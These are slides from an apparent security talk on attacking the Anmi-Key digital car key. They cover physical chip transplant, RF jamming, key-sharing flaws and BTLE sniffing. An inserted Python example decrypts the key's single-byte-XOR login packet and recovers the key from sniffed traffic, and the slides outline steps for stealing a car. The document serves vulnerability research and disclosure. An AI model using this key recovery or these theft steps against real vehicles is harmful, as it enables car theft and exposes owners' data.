GRAND THEFT AUTO
DIGITAL KEY HACKING
@Kevin2600
@MonkeyKing
Grand theft-auto-digital-key-hacking
Agenda:
. Introduction -- Keyfobs 101
. Structure & Functions -- Anmi-Key
. Analysis & Attack vectors -- Anmi-Key
. A0 -- Physical Access
. A1 -- RF Jamming Attack
. A2 -- Key-Sharing Analysis
. A3 -- BTLE Sniffing & Decryption
Introduction
. Mechanical Key Entry
. Remote Key Entry (Infrared; fixed code; rolling code)
. Passive Key Entry (Transponder RFID)
. Digital Key Entry (Mobile phone as Key)
Car-Keyfobs
New Trend?
. RKE KeeLoq algorithm cracked (2008)
. Passive Keyless entry Keyfob Relay attack (2012)
. Gone in 60 seconds -- Hijacking with Hitag2 (2012)
. Samy's Rolljam -- Drive it like you hacked it (2015)
. BMW ConnectedDrive -- Telematics hacked (2015)
. Mitsubishi Outlander WIFI Hacked -- PenTestPartners (2016)
. 14 vulnerabilities found in BMW connected cars -- KeenLab (2018)
What Was Hacked?
. Dieter Spaar discovered a flaw in BMW ConnectedDrive that allowed him to remotely unlock the vehicle
. Simulated a mobile network in a test environment with OpenBSC
. Once triggered by a decrypted SMS message, the vehicle sent a simple HTTP GET request to the server to retrieve the unlock command
New trend New hack - 2015
http://tiny.cc/bmwconnectedrive
. Mitsubishi Outlander PHEV: top-selling hybrid SUV. Control of the car through its WiFi access point
. Unique SSID (REMOTEnnaaaa), easy to locate on wigle.net. The Wi-Fi PSK is too short, so it can be cracked
. Control protocols were reverse engineered: turn on/off air conditioning, heating, lights and the alarm!!!
New trend New hack - 2016
http://tiny.cc/pentestpartners-Outlander
Structure & Functions -- Anmi
Digital Car key -- Anmi
Features
: Keyless Entrance System
: Keyless Engine Start/Stop
: Bluetooth Low Energy 4.0
: Auto Lock/Unlock Function
: Mobile as Key (Android; iPhone)
: Remote Keys Sharing (20 Users)
Components
Key-Pairing
Car-Models
Internal 1
Internal 2
Internal 3
. BTLE module (CC2640) communicates with the mobile APP over 2.4GHz
. RF module (NXP-61X0915) emits the unlock/lock cmd to the vehicle. The RF module varies between car models
. BTLE module (SYD8801) sensor: 2.4GHz BTLE SoC, 32-bit ARM Cortex-M0. Functionality unknown?
Mystery Sensor ?
RF-Module
Oscillator: 13.560MHz
Math:
13.560MHz / 8000 = 1695Hz
13.560MHz * 32 = 433.92MHz
SDR-HackRF
SDR-GQRX
BTLE-Module
BTLE-Interactive
BTLE-HCI-log
Mobile APP
Mobile APP - Codes
Mobile APP - MitMProxy
Mobile APP - Server
Say Bye Bye to your Privacy ..
Encryption ?
Super Secure ?
A0 -- Physical access
. The Anmi-Key, by design, is always left in the car
. Break the glass by force, get the Anmi-Key and unlock the door
. Desolder the registered Anmi chip and transplant it into a blank key
. Or use a self-designed board to emit the unlock cmd to the vehicle through the RF module
. Start the engine and drive away
Old School way
DEMO
A1 -- RF Jamming
RF-Jammer
Is the Anmi-Key smart enough to avoid this?
One-way communication ..
DEMO
What's Next
DRIVE IT LIKE YOU HACKED IT
@SamyKamkar
A2 -- Key-Sharing Analysis
Features
Analysis
What could possibly go wrong ?
Key-Sharing-Wechat
DEMO
Let's cancel it then ?
DEMO
Let's wait until it expired ?
DEMO
A3 -- BTLE Sniffing & Decryption
Where is the Secure Encryption ?
BTLE -- Analysis
BTLE -- 1st Attempt
BTLE -- Login Steps
Login -- Encryption
BTLE -- Login Protocol
Fetch a random values from Anmi-Key (4 bytes)
Calculate EncryptionCode (Random Value; Secret Key)
Wrap up to make an encrypted login packets
Send to Anmi-Key and Log in (Status 0xAA)
Only a 1-byte key is needed
Login -- Encryption
Arg6 is a DWORD random value from the fetch-random step
SecretKey is a fixed random DWORD number set at device initialization
Login Packet:
+0  byte      channel             0xA1
+1  short     len                 fixed at 43 00 (0x0043) for protocol 0301
+3  short     crc16
+5  short     protocolver         0301
+7  byte      usertype
+8  uchar[16] password
+24 uchar[16] enc_md5_username
+40 uchar[16] enc_md5_imei
+56 uchar[6]  enc_advertising_key  // ascii
+62 uchar[6]  enc_date             // YYMMDDHHMMSS
+68 uchar     enc_openrssi
+69 uchar     enc_lockRssi
All we need is to recover that single key byte
Login -- Encryption
What year is it now?
Recover the EncryptCode using the fixed year byte of enc_date: 0x12 (2018)
Then you can get:
Login -- Encryption
Login -- Crafting Packets
Error Code 0x66 ???
Login -- Firmware Inspection
Flag[1] is set only when Anmi-Key
is fully assembled
Login -- Crafting Packets
Login -- Sniffing Packets
Login -- Encryption
. 1-byte of encryption key
. XOR as the super secure
encryption algorithm
. Easy to recover by sniffing
the BTLE packets
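The login exchange and the key recovery described above, as an added example that is not code from the talk or from Anmi: it models the 70-byte login packet as laid out on the Login Packet slide, XORs the enc_* fields with a single key byte, then recovers that byte from a sniffed packet by using the fixed year byte (0x12 for 2018) as known plaintext. The CRC-16 variant, the MD5 input encoding, the byte order of protocolver, the choice to XOR only the enc_* fields (password carries no enc_ prefix), the sample username, IMEI, advertising key and secret, and derive_key_byte (a hypothetical stand-in for the app's EncryptionCode calculation, which the slides do not document) are all assumptions. The brute-force function goes beyond the slides: it shows the same key falls out even without assuming the year, because only a handful of the 256 candidates decrypt enc_date into a plausible timestamp.

```python
import hashlib
import struct
from datetime import datetime

# Offsets from the talk's "Login Packet" slide.
CHANNEL = 0xA1
PACKET_LEN = 70
OFF_LEN, OFF_CRC, OFF_PROTO, OFF_USERTYPE, OFF_PASSWORD = 1, 3, 5, 7, 8
OFF_USERNAME, OFF_IMEI, OFF_ADVKEY, OFF_DATE, OFF_OPENRSSI, OFF_LOCKRSSI = 24, 40, 56, 62, 68, 69
# Fields the slide labels enc_*: (name, offset, length). ASSUMPTION: these, and
# only these, are XORed; password has no enc_ prefix, so it is sent as-is here.
ENC_FIELDS = [("md5_username", OFF_USERNAME, 16), ("md5_imei", OFF_IMEI, 16),
              ("advertising_key", OFF_ADVKEY, 6), ("date", OFF_DATE, 6),
              ("open_rssi", OFF_OPENRSSI, 1), ("lock_rssi", OFF_LOCKRSSI, 1)]
YEAR_BYTE_2018 = 0x12   # binary (year - 2000) for 2018: the known plaintext the talk uses


def crc16_ccitt(data: bytes) -> int:
    """CRC-16/CCITT-FALSE (poly 0x1021, init 0xFFFF). ASSUMPTION: the slide only says 'crc16'."""
    crc = 0xFFFF
    for b in data:
        crc ^= b << 8
        for _ in range(8):
            crc = ((crc << 1) ^ 0x1021) & 0xFFFF if crc & 0x8000 else (crc << 1) & 0xFFFF
    return crc


def derive_key_byte(random4: bytes, secret4: bytes) -> int:
    """HYPOTHETICAL stand-in for the app's EncryptionCode(Random, SecretKey).
    The real derivation is not on the slides; the attack never needs it,
    only the fact that the output is a single XOR key byte."""
    folded = bytes(a ^ b for a, b in zip(random4, secret4))
    return folded[0] ^ folded[1] ^ folded[2] ^ folded[3]


def xor_bytes(data: bytes, key: int) -> bytes:
    """The 'super secure' cipher: every byte XORed with the same key byte."""
    return bytes(b ^ key for b in data)


def build_login_packet(key: int, username: str, imei: str, adv_key: bytes,
                       when: datetime, usertype: int = 0x01,
                       password: bytes = b"\x00" * 16,
                       open_rssi: int = 0xB0, lock_rssi: int = 0xA0) -> bytes:
    """Assemble the packet the mobile APP sends to the Anmi-Key after fetching the random value."""
    assert len(adv_key) == 6 and len(password) == 16
    date = bytes([when.year - 2000, when.month, when.day, when.hour, when.minute, when.second])
    body = bytearray(b"\x03\x01")               # protocolver, bytes as printed on the slide (assumption)
    body += bytes([usertype])
    body += password
    body += xor_bytes(hashlib.md5(username.encode()).digest(), key)
    body += xor_bytes(hashlib.md5(imei.encode()).digest(), key)
    body += xor_bytes(adv_key, key)
    body += xor_bytes(date, key)
    body += xor_bytes(bytes([open_rssi, lock_rssi]), key)
    # len counts everything after itself: crc16 (2) + body (65) = 0x43, matching "43 00".
    pkt = (bytes([CHANNEL]) + struct.pack("<H", len(body) + 2)
           + struct.pack("<H", crc16_ccitt(bytes(body))) + bytes(body))
    assert len(pkt) == PACKET_LEN and pkt[OFF_LEN:OFF_CRC] == b"\x43\x00"
    return pkt


def recover_key_known_year(pkt: bytes, year_byte: int = YEAR_BYTE_2018) -> int:
    """Known-plaintext attack from the talk: ciphertext year byte XOR known year byte = key."""
    return pkt[OFF_DATE] ^ year_byte


def recover_key_brute_force(pkt: bytes) -> list:
    """Beyond the slides: without assuming the year, keep every key whose decryption
    of enc_date is a plausible timestamp. The true key is always among the hits."""
    hits = []
    for k in range(256):
        yy, mm, dd, hh, mi, ss = xor_bytes(pkt[OFF_DATE:OFF_DATE + 6], k)
        if 15 <= yy <= 30 and 1 <= mm <= 12 and 1 <= dd <= 31 and hh < 24 and mi < 60 and ss < 60:
            hits.append(k)
    return hits


def decrypt_fields(pkt: bytes, key: int) -> dict:
    """Undo the XOR on every enc_* field of a sniffed packet."""
    return {name: xor_bytes(pkt[off:off + n], key) for name, off, n in ENC_FIELDS}


def sample_packet():
    """Constructed sample values; nothing here comes from a real Anmi-Key."""
    key = derive_key_byte(b"\xde\xad\xbe\xef", b"\x13\x37\x00\x42")
    pkt = build_login_packet(key, "alice", "356938035643809", b"ANMI01",
                             datetime(2018, 10, 5, 9, 30, 45))
    return key, pkt


if __name__ == "__main__":
    key, pkt = sample_packet()
    sniffed_key = recover_key_known_year(pkt)
    print(f"real key {key:#04x}, recovered {sniffed_key:#04x}, "
          f"brute-force candidates {[hex(k) for k in recover_key_brute_force(pkt)]}")
    print(decrypt_fields(pkt, sniffed_key))
```

Because the same key byte covers every enc_* field, one known byte of plaintext anywhere in the packet exposes everything else, including the MD5 of the username and IMEI; a real design would derive per-session keys and use an authenticated cipher rather than a single-byte XOR.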
DEMO
Report for CVE ?
Conclusion:
. Security by obscurity !?
. Don't trust the user input
. New trends come with new hacks
. Test the product properly, before going on market
Questions?